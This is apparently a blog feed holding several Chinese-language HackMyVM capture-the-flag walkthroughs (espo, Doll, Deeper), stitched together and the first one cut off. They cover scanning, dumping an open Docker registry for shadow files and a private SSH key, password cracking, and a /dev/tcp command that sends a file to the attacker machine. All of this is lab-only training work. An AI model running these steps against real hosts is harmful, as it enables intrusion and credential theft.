scanned in 1.43 seconds ``` 先看**80端口**，**22端口**候补 # 2.踩点  一个查询页面，可以输入数值进行查询，有效范围是**1-99**，后面的数据是重复的。https://7r1UMPH.github.io/post/hmv_flossy.htmlThu, 20 Mar 2025 08:06:41 +0000https://7r1UMPH.github.io/post/hmv_espo.html# hmv_espo # 0.简介 **靶机**：[hackmyvm - espo](https://hackmyvm.eu/machines/machine.php?vm=espo) **难度**：黄色 **目标 IP**：192.168.205.236 **本机 IP**：192.168.205.141 --- # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS -p- -Pn -n -T4 192.168.205.236 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 13:19 CST Nmap scan report for 192.168.205.236 Host is up (0.00024s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:9F:01:54 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds ``` --- # 2.踩点  是个登录栏，搜索一下有没有什么漏洞 ```bash ┌──(kali㉿kali)-[~/test] └─$ whatweb http://192.168.205.236 http://192.168.205.236 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[192.168.205.236], PHP[8.2.7], PoweredBy[EspoCRM], Script[text/javascript], Title[EspoCRM], UncommonHeaders[x-content-type-options,content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/8.2.7], nginx ┌──(kali㉿kali)-[~/test] └─$ searchsploit EspoCRM ---------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------- --------------------------------- EspoCRM 5.8.5 - Privilege Escalation | multiple/webapps/48376.txt ---------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` 只有权限提升漏洞，但是我们没有用户。https://7r1UMPH.github.io/post/hmv_espo.htmlThu, 20 Mar 2025 08:05:38 +0000https://7r1UMPH.github.io/post/hmv_Doll.html# hmv_Doll # 0.闲聊  **靶机：** https://hackmyvm.eu/machines/machine.php?vm=Doll **靶机 IP：** 192.168.72.129 **kali IP：** 192.168.72.128 今天年初二，有点空，更新一下wp # 1.扫描 ​`nmap`​开扫 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS -Pn -n -p- --min-rate 10000 192.168.72.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-29 20:16 EST Nmap scan report for 192.168.72.129 Host is up (0.00020s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 1007/tcp open unknown MAC Address: 08:00:27:F7:F4:53 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds ``` 其中`1007`​不知道是什么服务，我们详细扫描一下 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sT -sV -Pn -n -p1007 192.168.72.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-29 20:17 EST Nmap scan report for 192.168.72.129 Host is up (0.00039s latency). PORT STATE SERVICE VERSION 1007/tcp open http Docker Registry (API: 2.0) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.26 seconds ``` 不知道是什么东西，我们等会搜索一下 # 2.踩点 在**hacktricks**​上找到[5000 - Pentesting Docker Registry](https://book.hacktricks.wiki/zh/network-services-pentesting/5000-pentesting-docker-registry.html)这篇文章  ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.72.129:1007/v2/_catalog {'repositories':['dolly']} ``` 继续利用 ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.72.129:1007/v2/dolly/tags/list {'name':'dolly','tags':['latest']} ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.72.129:1007/v2/dolly/manifests/latest { 'schemaVersion': 1, 'name': 'dolly', 'tag': 'latest', 'architecture': 'amd64', 'fsLayers': [ { 'blobSum': 'sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017' }, { 'blobSum': 'sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4' }, { 'blobSum': 'sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4' }, { 'blobSum': 'sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09' } ], 'history': [ { 'v1Compatibility': '{\'architecture\':\'amd64\',\'config\':{\'Hostname\':\'10ddd4608cdf\',\'Domainname\':\'\',\'User\':\'\',\'AttachStdin\':true,\'AttachStdout\':true,\'AttachStderr\':true,\'Tty\':true,\'OpenStdin\':true,\'StdinOnce\':true,\'Env\':[\'PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\'],\'Cmd\':[\'/bin/sh\'],\'Image\':\'doll\',\'Volumes\':null,\'WorkingDir\':\'\',\'Entrypoint\':null,\'OnBuild\':null,\'Labels\':{}},\'container\':\'10ddd4608cdfd81cd95111ecfa37499635f430b614fa326a6526eef17a215f06\',\'container_config\':{\'Hostname\':\'10ddd4608cdf\',\'Domainname\':\'\',\'User\':\'\',\'AttachStdin\':true,\'AttachStdout\':true,\'AttachStderr\':true,\'Tty\':true,\'OpenStdin\':true,\'StdinOnce\':true,\'Env\':[\'PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\'],\'Cmd\':[\'/bin/sh\'],\'Image\':\'doll\',\'Volumes\':null,\'WorkingDir\':\'\',\'Entrypoint\':null,\'OnBuild\':null,\'Labels\':{}},\'created\':\'2023-04-25T08:58:11.460540528Z\',\'docker_version\':\'23.0.4\',\'id\':\'89cefe32583c18fc5d6e6a5ffc138147094daac30a593800fe5b6615f2d34fd6\',\'os\':\'linux\',\'parent\':\'1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\'}' }, { 'v1Compatibility': '{\'id\':\'1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\',\'parent\':\'638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\',\'comment\':\'buildkit.dockerfile.v0\',\'created\':\'2023-03-29T18:19:24.45578926Z\',\'container_config\':{\'Cmd\':[\'ARG passwd=devilcollectsit\']},\'throwaway\':true}' }, { 'v1Compatibility': '{\'id\':\'638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\',\'parent\':\'cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\',\'created\':\'2023-03-29T18:19:24.45578926Z\',\'container_config\':{\'Cmd\':[\'/bin/sh -c #(nop) CMD [\\\'/bin/sh\\\']\']},\'throwaway\':true}' }, { 'v1Compatibility': '{\'id\':\'cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\',\'created\':\'2023-03-29T18:19:24.348438709Z\',\'container_config\':{\'Cmd\':[\'/bin/sh -c #(nop) ADD file:9a4f77dfaba7fd2aa78186e4ef0e7486ad55101cefc1fabbc1b385601bb38920 in / \']}}' } ], 'signatures': [ { 'header': { 'jwk': { 'crv': 'P-256', 'kid': 'X7W5:IVTA:CKTP:A6JJ:IMVJ:FOTQ:OO4M:CB4C:6JYB:PX6R:DQ6C:JPGS', 'kty': 'EC', 'x': 'm6jL0NHxYkVUo0-ID-HLzT0Y3OqOeOBvekpF98kC-4c', 'y': 'WlToBayTJ8f4zcry3wiq1fMvedgRkuwE7Oycza83_YA' }, 'alg': 'ES256' }, 'signature': 'n75fkjkUhAvtqrT2JfMVuBUtIUgiZ0ZhgYmM4m9kqOHprKnq7YrMyNKYYTntkxDmN2uW2w_3o36LvmRW7KzyOg', 'protected': 'eyJmb3JtYXRMZW5ndGgiOjI4MjksImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyNS0wMS0zMFQwMToyOTo0NVoifQ' } ] } ┌──(kali㉿kali)-[~/test] └─$ mkdir tmp ┌──(kali㉿kali)-[~/test] └─$ cd tmp ┌──(kali㉿kali)-[~/test/tmp] └─$ curl http://192.168.72.129:1007/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 -o blob1.tar % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3707 100 3707 0 0 971k 0 --:--:-- --:--:-- --:--:-- 1206k ┌──(kali㉿kali)-[~/test/tmp] └─$ tar -xf blob1.tar ┌──(kali㉿kali)-[~/test/tmp] └─$ ls -la 总计 24 drwxrwxr-x 5 kali kali 4096 1月29日 20:32 . drwxrwxr-x 4 kali kali 4096 1月29日 20:32 .. -rw-rw-r-- 1 kali kali 3707 1月29日 20:32 blob1.tar drwxr-xr-x 2 kali kali 4096 2023年 4月25日 etc drwxr-xr-x 3 kali kali 4096 2023年 4月25日 home drwx------ 2 kali kali 4096 2023年 4月25日 root ┌──(kali㉿kali)-[~/test/tmp] └─$ cd etc ┌──(kali㉿kali)-[~/test/tmp/etc] └─$ ls -al 总计 32 drwxr-xr-x 2 kali kali 4096 2023年 4月25日 . drwxrwxr-x 5 kali kali 4096 1月29日 20:32 .. -rw-r--r-- 1 kali kali 710 2023年 4月25日 group -rw-r--r-- 1 kali kali 697 2022年11月 4日 group- -rw-r--r-- 1 kali kali 1223 2023年 4月25日 passwd -rw-r--r-- 1 kali kali 1223 2023年 4月25日 passwd- -rw-r----- 1 kali kali 553 2023年 4月25日 shadow -rw-r----- 1 kali kali 448 2023年 4月25日 shadow- ┌──(kali㉿kali)-[~/test/tmp/etc] └─$ cat * root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon tty:x:5: disk:x:6:root,adm lp:x:7:lp mem:x:8: kmem:x:9: wheel:x:10:root floppy:x:11:root mail:x:12:mail news:x:13:news uucp:x:14:uucp man:x:15:man cron:x:16:cron console:x:17: audio:x:18: cdrom:x:19: dialout:x:20:root ftp:x:21: sshd:x:22: input:x:23: at:x:25:at tape:x:26:root video:x:27:root netdev:x:28: readproc:x:30: squid:x:31:squid xfs:x:33:xfs kvm:x:34:kvm games:x:35: shadow:x:42: cdrw:x:80: www-data:x:82: usb:x:85: vpopmail:x:89: users:x:100:games ntp:x:123: nofiles:x:200: smmsp:x:209:smmsp locate:x:245: abuild:x:300: utmp:x:406: ping:x:999: nogroup:x:65533: nobody:x:65534: bela:x:1000: root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon tty:x:5: disk:x:6:root,adm lp:x:7:lp mem:x:8: kmem:x:9: wheel:x:10:root floppy:x:11:root mail:x:12:mail news:x:13:news uucp:x:14:uucp man:x:15:man cron:x:16:cron console:x:17: audio:x:18: cdrom:x:19: dialout:x:20:root ftp:x:21: sshd:x:22: input:x:23: at:x:25:at tape:x:26:root video:x:27:root netdev:x:28: readproc:x:30: squid:x:31:squid xfs:x:33:xfs kvm:x:34:kvm games:x:35: shadow:x:42: cdrw:x:80: www-data:x:82: usb:x:85: vpopmail:x:89: users:x:100:games ntp:x:123: nofiles:x:200: smmsp:x:209:smmsp locate:x:245: abuild:x:300: utmp:x:406: ping:x:999: nogroup:x:65533: nobody:x:65534: root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin bela:x:1000:1000:Linux User,,,:/home/bela:/bin/ash root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin bela:x:1000:1000:Linux User,,,:/home/bela:/bin/ash root:*::0::::: bin:!::0::::: daemon:!::0::::: adm:!::0::::: lp:!::0::::: sync:!::0::::: shutdown:!::0::::: halt:!::0::::: mail:!::0::::: news:!::0::::: uucp:!::0::::: operator:!::0::::: man:!::0::::: postmaster:!::0::::: cron:!::0::::: ftp:!::0::::: sshd:!::0::::: at:!::0::::: squid:!::0::::: xfs:!::0::::: games:!::0::::: cyrus:!::0::::: vpopmail:!::0::::: ntp:!::0::::: smmsp:!::0::::: guest:!::0::::: nobody:!::0::::: bela:$6$azVVFjn.mkvh.lhA$yAXPBGOZDXRdDBmn3obtzhUzxwfDD7u3YIcixohpKzTGpJS0Oeu7UVoguhmwg4DHNM8K5z7Tn93BBaDadM/A5.:19472:0:99999:7::: root:*::0::::: bin:!::0::::: daemon:!::0::::: adm:!::0::::: lp:!::0::::: sync:!::0::::: shutdown:!::0::::: halt:!::0::::: mail:!::0::::: news:!::0::::: uucp:!::0::::: operator:!::0::::: man:!::0::::: postmaster:!::0::::: cron:!::0::::: ftp:!::0::::: sshd:!::0::::: at:!::0::::: squid:!::0::::: xfs:!::0::::: games:!::0::::: cyrus:!::0::::: vpopmail:!::0::::: ntp:!::0::::: smmsp:!::0::::: guest:!::0::::: nobody:!::0::::: bela:!:19472:0:99999:7::: ┌──(kali㉿kali)-[~/test/tmp/etc] └─$ cd .. ┌──(kali㉿kali)-[~/test/tmp] └─$ ls la ls: 无法访问 'la': 没有那个文件或目录 ┌──(kali㉿kali)-[~/test/tmp] └─$ ls -la 总计 24 drwxrwxr-x 5 kali kali 4096 1月29日 20:32 . drwxrwxr-x 4 kali kali 4096 1月29日 20:32 .. -rw-rw-r-- 1 kali kali 3707 1月29日 20:32 blob1.tar drwxr-xr-x 2 kali kali 4096 2023年 4月25日 etc drwxr-xr-x 3 kali kali 4096 2023年 4月25日 home drwx------ 2 kali kali 4096 2023年 4月25日 root ┌──(kali㉿kali)-[~/test/tmp] └─$ cd home ┌──(kali㉿kali)-[~/test/tmp/home] └─$ ls -al 总计 12 drwxr-xr-x 3 kali kali 4096 2023年 4月25日 . drwxrwxr-x 5 kali kali 4096 1月29日 20:32 .. drwxr-xr-x 3 kali kali 4096 2023年 4月25日 bela ┌──(kali㉿kali)-[~/test/tmp/home] └─$ cd bela ┌──(kali㉿kali)-[~/test/tmp/home/bela] └─$ l -al 总计 16 drwxr-xr-x 3 kali kali 4096 2023年 4月25日 ./ drwxr-xr-x 3 kali kali 4096 2023年 4月25日 ../ -rw------- 1 kali kali 57 2023年 4月25日 .ash_history drwxr-xr-x 2 kali kali 4096 2023年 4月25日 .ssh/ -rwxr-xr-x 1 kali kali 0 1969年12月31日 .wh..wh..opq* ┌──(kali㉿kali)-[~/test/tmp/home/bela] └─$ cat .ash_history pwd ls -la mkdir .ssh cd .ssh nano id_rsa vi id_rsa exit ┌──(kali㉿kali)-[~/test/tmp/home/bela] └─$ cat .wh..wh..opq ┌──(kali㉿kali)-[~/test/tmp/home/bela] └─$ cd .ssh ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ ls -al 总计 12 drwxr-xr-x 2 kali kali 4096 2023年 4月25日 . drwxr-xr-x 3 kali kali 4096 2023年 4月25日 .. -rw-r--r-- 1 kali kali 2635 2023年 4月25日 id_rsa ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 VtVwCw== -----END OPENSSH PRIVATE KEY----- ``` 省了，都不用爆破shadow了 ``` ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ ssh2john id_rsa > hash ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Created directory: /home/kali/.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 12 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:01:24 0.05% (ETA: 2025-01-31 17:41) 0g/s 105.4p/s 105.4c/s 105.4C/s passat..kicker 0g 0:00:01:39 0.06% (ETA: 2025-01-31 17:26) 0g/s 105.9p/s 105.9c/s 105.9C/s strokes..jhoan ``` 爆破不出来，不会是用这个吧  试试 ``` ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ chmod 600 id_rsa ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ ssh bela@192.168.72.129 -i id_rsa ssh: connect to host 192.168.72.129 port 22: No route to host ┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh] └─$ ssh bela@192.168.72.129 -i id_rsa Enter passphrase for key 'id_rsa': Linux doll 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Apr 25 10:35:13 2023 from 192.168.0.100 bela@doll:~$ id uid=1000(bela) gid=1000(bela) grupos=1000(bela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) ``` # 3.提权 ``` bela@doll:~$ sudo -l Matching Defaults entries for bela on doll: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User bela may run the following commands on doll: (ALL) NOPASSWD: /usr/bin/fzf --listen\=1337 ``` ​`fzf`​ 是一个交互式命令行模糊查找工具，并且其 `--listen`​ 选项允许它接收来自远程连接的命令。https://7r1UMPH.github.io/post/hmv_Doll.htmlThu, 20 Mar 2025 08:04:37 +0000https://7r1UMPH.github.io/post/hmv_Deeper.html# hmv_Deeper # 0.简介 **靶机**：[hackmyvm - Deeper](https://hackmyvm.eu/machines/machine.php?vm=Deeper) **难度**：绿色 **目标 IP**：192.168.205.143 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 16:34 CST Nmap scan report for 192.168.205.143 Host is up (0.00046s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:49:23:DF (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds ``` # 2.踩点  加上    解码（[cyberchef](https://cyberchef.org/)）   # 3.提权 ```bash ┌──(kali㉿kali)-[~/test] └─$ ssh alice@192.168.205.143 The authenticity of host '192.168.205.143 (192.168.205.143)' can't be established. ED25519 key fingerprint is SHA256:LsWOF4O2aDb/w6V7Z5VEAcjNfkxMmPOzyEIC7HMr91o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.205.143' (ED25519) to the list of known hosts. alice@192.168.205.143's password: Linux deeper 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Aug 26 00:38:16 2023 from 192.168.100.103 alice@deeper:~$ id uid=1000(alice) gid=1000(alice) groups=1000(alice) alice@deeper:~$ sudo -l [sudo] password for alice: Sorry, user alice may not run sudo on deeper. alice@deeper:~$ ls -la total 32 drwxr--r-- 3 alice alice 4096 Aug 26 2023 . drwxr-xr-x 4 root root 4096 Aug 25 2023 .. lrwxrwxrwx 1 alice alice 9 Aug 25 2023 .bash_history -> /dev/null -rw-r--r-- 1 alice alice 220 Aug 25 2023 .bash_logout -rw-r--r-- 1 alice alice 3526 Aug 25 2023 .bashrc -rw-r--r-- 1 alice alice 41 Aug 25 2023 .bob.txt drwxr-xr-x 3 alice alice 4096 Aug 26 2023 .local -rw-r--r-- 1 alice alice 807 Aug 25 2023 .profile -rw-r--r-- 1 alice alice 33 Aug 26 2023 user.txt alice@deeper:~$ cat .bob.txt 535746745247566c634556756233566e61413d3d ```  ```bash alice@deeper:/home$ su - bob Password: bob@deeper:~$ id uid=1001(bob) gid=1001(bob) groups=1001(bob) bob@deeper:~$ sudo -l [sudo] password for bob: Sorry, user bob may not run sudo on deeper. bob@deeper:~$ ls -la total 28 drwxr--r-- 3 bob bob 4096 Aug 26 2023 . drwxr-xr-x 4 root root 4096 Aug 25 2023 .. lrwxrwxrwx 1 bob bob 9 Aug 25 2023 .bash_history -> /dev/null -rw-r--r-- 1 bob bob 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 bob bob 3526 Apr 23 2023 .bashrc drwxr-xr-x 3 bob bob 4096 Aug 25 2023 .local -rw-r--r-- 1 bob bob 807 Aug 25 2023 .profile -rw-r--r-- 1 bob bob 215 Aug 26 2023 root.zip bob@deeper:~$ cat root.zip > /dev/tcp/192.168.205.141/7777 #kali ┌──(kali㉿kali)-[~/test/tmp] └─$ nc -lvnp 7777 > root.zip listening on [any] 7777 ... connect to [192.168.205.141] from (UNKNOWN) [192.168.205.143] 40706 ┌──(kali㉿kali)-[~/test/tmp] └─$ zip2john root.zip > hash ver 1.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: 2b chk, TS_chk, cmplen=33, decmplen=21, crc=2D649941 ts=BA81 cs=ba81 type=0 ┌──(kali㉿kali)-[~/test/tmp] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) No password hashes left to crack (see FAQ) ┌──(kali㉿kali)-[~/test/tmp] └─$ john --show hash root.zip/root.txt:bob:root.txt:root.zip::root.zip 1 password hash cracked, 0 left ┌──(kali㉿kali)-[~/test/tmp] └─$ unzip root.zip Archive: root.zip [root.zip] root.txt password: extracting: root.txt ┌──(kali㉿kali)-[~/test/tmp] └─$ cat root.txt root:IhateMyPassword ``` 登录root ```bash bob@deeper:~$ su - Password: root@deeper:~# id uid=0(root) gid=0(root) groups=0(root) ```。https://7r1UMPH.github.io/post/hmv_Deeper.htmlThu, 20 Mar 2025 